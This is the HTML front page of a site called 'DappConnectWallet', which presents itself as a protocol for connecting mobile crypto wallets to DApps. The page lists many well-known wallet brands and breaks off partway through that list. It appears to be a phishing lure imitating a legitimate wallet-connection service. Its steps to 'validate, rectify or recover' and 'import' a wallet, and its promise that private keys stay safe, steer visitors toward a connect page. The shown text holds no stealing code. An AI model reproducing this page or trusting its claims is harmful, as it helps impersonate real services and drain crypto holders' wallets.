<!DOCTYPE html>

<html>

<head>
    <meta name="viewport" content="width=device-width" />
    <meta charSet="utf-8" />
    <title>DappConnectWallet</title>
    <meta name="description" content="DappConnectWallet is a free protocol that lets users manage all their wallets from one space" />
    <link rel="icon" href="favicon.ico" />
    <meta name="next-head-count" content="5" />
    <link rel="preload" href="main.css" as="style" />
    <link rel="stylesheet" href="main.css" data-n-g="" />
    <noscript data-n-css=""></noscript>
    <!--link rel="preload" href="/_next/static/chunks/webpack-189c53927ffd3caf09c3.js" as="script" /-->
    <link rel="preload" href="/_next/static/chunks/framework-92300432a1172ef1338b.js" as="script" />
    <link rel="preload" href="/_next/static/chunks/main-71948af4b0f09c0fc30e.js" as="script" />
    <link rel="preload" href="/_next/static/chunks/pages/_app-9e366951ad03f095f5b3.js" as="script" />
    <link rel="preload" href="/_next/static/chunks/814-16eda819eff2e28d39ff.js" as="script" />
    <link rel="preload" href="/_next/static/chunks/748-ecf7ef402c655d9fd446.js" as="script" />
    <link rel="preload" href="/_next/static/chunks/pages/index-ec7c947b1f1bbe86fe3b.js" as="script" />
</head>

<body>
    <div id="__next">
        <header class="fixed z-50 w-full bg-white py-4 sm:py-5 px-2 sm:px-3 border-b shadow-md">
            <div class="container max-w-screen-lg mx-auto flex flex-row items-center justify-between">
                <div class="inline-flex items-center justify-center cursor-pointer">
                    <img src="logo.svg" class="h-10 w-10" />
                    <a class="text-xl ml-2 font-black" href="index.html">DappConnectWallet </a>
                </div>
                <div>
                    <a class="inline-flex items-center justify-center text-white cursor-pointer hover:text-primary bg-primary hover:bg-transparent font-bold px-6 py-2 rounded-md border-2 border-primary" href="connect.html">Connect</a>
                </div>
            </div>
        </header>
        <div class="h-14"></div>
        <main>
            <section class="relative bg-white py-16 px-6">
                <div class="container max-w-screen-lg mx-auto flex flex-col md:flex-row-reverse items-center justify-center">
                    <div class="text-left max-w-md mb-8 px-2 md:mb-0">

                    </div>
                    <div class="text-center max-w-md">
                        <h2 class="text-3xl mb-4 font-black">Link your DApps to mobile wallets</h2>
                        <p class="text-base mb-8">DappConnectWallet is an open protocol that lets users connect their mobile crypto wallets to your DApp.</p>
                        <a class="text-white cursor-pointer hover:text-primary bg-primary hover:bg-transparent font-bold px-5 py-3 rounded-md border-2 border-primary" href="connect.html">Connect Wallet</a>
                    </div>
                </div>
            </section>
            <section class="relative md:px-6 py-20 bg-secondary">
                <h2 class="text-center mb-5 text-white font-black text-2xl md:text-3xl">Get Started in 3 Easy Steps</h2>
                <div class="container max-w-screen-lg mx-auto flex flex-row items-center md:justify-between">
                    <ul class="relative shadow-md border bg-white flex flex-col md:flex-row m-1 pt-10 md:pt-0  z-10 rounded">
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h2 class="text-2xl font-black text-primary">1.</h2>
                            <h3 class="text-lg mt-1 mb-2 font-bold">Choose Wallet</h3>
                            <p class="text-sm m-0">Select from our wide range of supported crypto wallets and either synchronize, validate, rectify or recover wallet.</p>
                        </li>
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h2 class="text-2xl font-black text-primary">2.</h2>
                            <h3 class="text-lg mt-1 mb-2 font-bold">Validate Wallet</h3>
                            <p class="text-sm m-0">Prove ownership of the wallet you want to import. Private keys never leave mobile wallets, keeping user funds safe.</p>
                        </li>
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h2 class="text-2xl font-black text-primary">3.</h2>
                            <h3 class="text-lg mt-1 mb-2 font-bold">Get Connected</h3>
                            <p class="text-sm m-0">End-to-end encryption using client-side generated keys keeps all user activity private.</p>
                        </li>
                    </ul>
                </div>
            </section>
            <section class="relative bg-white py-14 px-6 text-secondary">
                <div class="container max-w-screen-lg mx-auto flex flex-col items-center md:justify-between">
                    <div class="text-center">
                        <h2 class="text-2xl text-center font-bold mb-2">Supported Wallets</h2>
                        <p class="text-sm mb-4">All these wallets and many others</p>
                        <div class="flex justify-center">
                            <div class="grid max-w-3xl grid-cols-2 gap-10 mt-6 sm:grid-cols-3 md:grid-cols-4">
                                <a href="https://rainbow.me/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/1ae92b26df02f0abca6304df07debccd18262fdf5fe82daa81593582dac9a369.jpeg" alt="Rainbow" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Rainbow</div>
                                    </div>
                                </a>
                                <a href="https://trustwallet.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/4622a2b2d6af1c9844944291e5e7351a6aa24cd7b23099efac1b2fd875da31a0.jpeg" alt="Trust Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Trust Wallet</div>
                                    </div>
                                </a>
                                <a href="https://argent.xyz/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/cf21952a9bc8108bf13b12c92443751e2cc388d27008be4201b92bbc6d83dd46.jpeg" alt="Argent" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Argent</div>
                                    </div>
                                </a>
                                <a href="https://metamask.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/c57ca95b47569778a828d19178114f4db188b89b763c899ba0be274e97267d96.jpeg" alt="MetaMask" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">MetaMask</div>
                                    </div>
                                </a>
                                <a href="https://gnosis-safe.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/a5cfbd9a263c9dcfb59d6e9dc00933c46f00277ed78a6a0a1e38b0c17e09671f.jpeg" alt="Gnosis Safe Multisig" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Gnosis Safe Multisig</div>
                                    </div>
                                </a>
                                <a href="https://crypto.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/f2436c67184f158d1beda5df53298ee84abfc367581e4505134b5bcf5f46697d.jpeg" alt="Crypto.com | DeFi Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Crypto.com | DeFi Wallet</div>
                                    </div>
                                </a>
                                <a href="https://pillarproject.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/0b58bf037bf943e934706796fb017d59eace1dadcbc1d9fe24d9b46629e5985c.jpeg" alt="Pillar" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Pillar</div>
                                    </div>
                                </a>
                                <a href="https://token.im/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/9d373b43ad4d2cf190fb1a774ec964a1addf406d6fd24af94ab7596e58c291b2.jpeg" alt="imToken" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">imToken</div>
                                    </div>
                                </a>
                                <a href="https://onto.app/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/dceb063851b1833cbb209e3717a0a0b06bf3fb500fe9db8cd3a553e4b1d02137.jpeg" alt="ONTO" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">ONTO</div>
                                    </div>
                                </a>
                                <a href="https://tokenpocket.pro/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/20459438007b75f4f4acb98bf29aa3b800550309646d375da5fd4aac6c2a2c66.jpeg" alt="TokenPocket" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">TokenPocket</div>
                                    </div>
                                </a>
                                <a href="https://mathwallet.org/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/7674bb4e353bf52886768a3ddc2a4562ce2f4191c80831291218ebd90f5f5e26.jpeg" alt="MathWallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">MathWallet</div>
                                    </div>
                                </a>
                                <a href="https://bitpay.com" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/ccb714920401f7d008dbe11281ae70e3a4bfb621763b187b9e4a3ce1ab8faa3b.jpeg" alt="BitPay" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">BitPay</div>
                                    </div>
                                </a>
                                <a href="https://www.ledger.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/4ab2542c2799c825a8465ba5ab8aa7def52b7904f38b74484af917ed9c0fc4e5.jpeg" alt="Ledger Live" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Ledger Live</div>
                                    </div>
                                </a>
                                <a href="https://walleth.org/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/83f26999937cbc2e2014655796da4b05f77c1de9413a0ee6d0c6178ebcfc3168.jpeg" alt="Walleth" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Walleth</div>
                                    </div>
                                </a>
                                <a href="https://authereum.org" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/71dad538ba02a9b321041d388f9c1efe14e0d1915a2ea80a90405d2f6b67a33d.jpeg" alt="Authereum" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Authereum</div>
                                    </div>
                                </a>
                                <a href="https://www.dharma.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/9dab7bd72148e2f796452630230666daf507935fae7bb9baf22b3c11960b034f.jpeg" alt="Dharma" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Dharma</div>
                                    </div>
                                </a>
                                <a href="https://1inch.io/wallet/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/09102e7bbbd3f92001eda104abe23803181629f695e8f1b95af96d88ff7d5890.jpeg" alt="1inch Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">1inch Wallet</div>
                                    </div>
                                </a>
                                <a href="https://huobiwallet.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/bae74827272509a6d63ea25514d9c68ad235c14e45e183518c7ded4572a1b0c4.jpeg" alt="Huobi Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Huobi Wallet</div>
                                    </div>
                                </a>
                                <a href="https://eidoo.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/efba9ae0a9e0fdd9e3e055ddf3c8e75f294babb8aea3499456eff27f771fda61.jpeg" alt="Eidoo" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Eidoo</div>
                                    </div>
                                </a>
                                <a href="https://mykey.org" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/61f6e716826ae8455ad16abc5ec31e4fd5d6d2675f0ce2dee3336335431f720e.jpeg" alt="MYKEY" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">MYKEY</div>
                                    </div>
                                </a>
                                <a href="https://loopring.io" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/dcf291a025ead3e94ef694fa75617568daf76bf1e525bb240ecf5bf1add53756.jpeg" alt="Loopring Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Loopring Wallet</div>
                                    </div>
                                </a>
                                <a href="https://trustology.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/6bb4596640ce9f8c02fbaa83e3685425455a0917d025608b4abc53bfe55887c6.jpeg" alt="TrustVault" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">TrustVault</div>
                                    </div>
                                </a>
                                <a href="https://atomicwallet.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/185850e869e40f4e6c59b5b3f60b7e63a72e88b09e2a43a40b1fd0f237e49e9a.jpeg" alt="Atomic" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Atomic</div>
                                    </div>
                                </a>
                                <a href="https://coin98.app/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/b021913ba555948a1c81eb3d89b372be46f8354e926679de648e4fa2938bed3e.jpeg" alt="Coin98" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Coin98</div>
                                    </div>
                                </a>
                                <a href="https://coolwallet.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/1f69170bf7a9bdcf89403ec012659b7124e158f925cdd4a2be49274c24cf5e5d.jpeg" alt="CoolWallet S" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">CoolWallet S</div>
                                    </div>
                                </a>
                                <a href="https://alicedapp.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/beea4e71c2ffbb48b59b21e33fb0049ef6522585aa9c8a33a97d3e1c81f16693.jpeg" alt="Alice" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Alice</div>
                                    </div>
                                </a>
                                <a href="https://alphawallet.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/138f51c8d00ac7b9ac9d8dc75344d096a7dfe370a568aa167eabc0a21830ed98.jpeg" alt="AlphaWallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">AlphaWallet</div>
                                    </div>
                                </a>
                                <a href="https://dcentwallet.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/468b4ab3582757233017ec10735863489104515ab160c053074905a1eecb7e63.jpeg" alt="D&#x27;CENT Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">D &#x27;CENT Wallet</div>
                                    </div>
                                </a>
                                <a href="https://zel.network" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/29f4a70ad5993f3f73ae8119f0e78ecbae51deec2a021a770225c644935c0f09.jpeg" alt="ZelCore" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">ZelCore</div>
                                    </div>
                                </a>
                                <a href="https://nash.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/8605171a052e85d629c5efe5db804c7a3fb6d0ecc759d6817f0a18cb3dacbb14.jpeg" alt="Nash" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Nash</div>
                                    </div>
                                </a>
                                <a href="https://coinomi.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/9277bc510b6d95f29be38e7c0e402ae8438262f0f4c6dbb40dfc22f5043e8814.jpeg" alt="Coinomi" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Coinomi</div>
                                    </div>
                                </a>
                                <a href="https://gridplus.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/6ec1ffc9627c3b9f87676da3f7b5796828a6c016d3253e51e771e6f951cb5702.jpeg" alt="GridPlus" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">GridPlus</div>
                                    </div>
                                </a>
                                <a href="https://cybavo.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/a395dbfc92b5519cbd1cc6937a4e79830187daaeb2c6fcdf9b9cce4255f2dcd5.jpeg" alt="CYBAVO Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">CYBAVO Wallet</div>
                                    </div>
                                </a>
                                <a href="https://tokenary.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/c889f5add667a8c69d147d613c7f18a4bd97c2e47c946cabfdd13ec1d596e4a0.jpeg" alt="Tokenary" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Tokenary</div>
                                    </div>
                                </a>
                                <a href="https://toruswallet.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/3f1bc4a8fd72b3665459ec5c99ee51b424f6beeebe46b45f4a70cf08a84cbc50.jpeg" alt="Torus" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Torus</div>
                                    </div>
                                </a>
                                <a href="https://spatium.net/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/7b83869f03dc3848866e0299bc630aaf3213bea95cd6cecfbe149389cf457a09.jpeg" alt="Spatium" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Spatium</div>
                                    </div>
                                </a>
                                <a href="https://safepal.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/0b415a746fb9ee99cce155c2ceca0c6f6061b1dbca2d722b3ba16381d0562150.jpeg" alt="SafePal" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">SafePal</div>
                                    </div>
                                </a>
                                <a href="https://infinitowallet.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/d0387325e894a1c4244820260ad7c78bb20d79eeec2fd59ffe3529223f3f84c6.jpeg" alt="Infinito" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Infinito</div>
                                    </div>
                                </a>
                                <a href="https://wallet.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/176b83d9268d77438e32aa44770fb37b40d6448740b6a05a97b175323356bd1b.jpeg" alt="wallet.io" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">wallet.io</div>
                                    </div>
                                </a>
                                <a href="https://infinitywallet.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/802a2041afdaf4c7e41a2903e98df333c8835897532699ad370f829390c6900f.jpeg" alt="Infinity Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Infinity Wallet</div>
                                    </div>
                                </a>
                                <a href="https://ownbit.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/8fb830a15679a8537d84c3852e026a4bdb39d0ee3b387411a91e8f6abafdc1ad.jpeg" alt="Ownbit" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Ownbit</div>
                                    </div>
                                </a>
                                <a href="https://easypocket.app/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
